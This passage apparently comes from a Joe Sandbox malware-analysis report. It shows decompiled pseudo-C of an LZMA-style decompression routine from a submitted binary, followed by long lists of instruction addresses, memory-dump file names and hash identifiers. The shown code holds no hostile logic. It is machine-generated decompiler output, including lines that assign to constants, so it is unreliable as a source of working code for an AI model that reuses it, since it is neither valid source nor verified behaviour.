													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                      0x00000000
                      0x00406409
                      0x00406409
                      0x0040640d
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x0040640f
                      0x0040640f
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00406343
                      0x00406346
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x004066bb
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x004068d2
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x004068ee
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00406734
                      0x00406734
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00000000
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004066bb
                      0x004066b8
                      0x00000000
                      0x0040640d

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                      • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                      • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
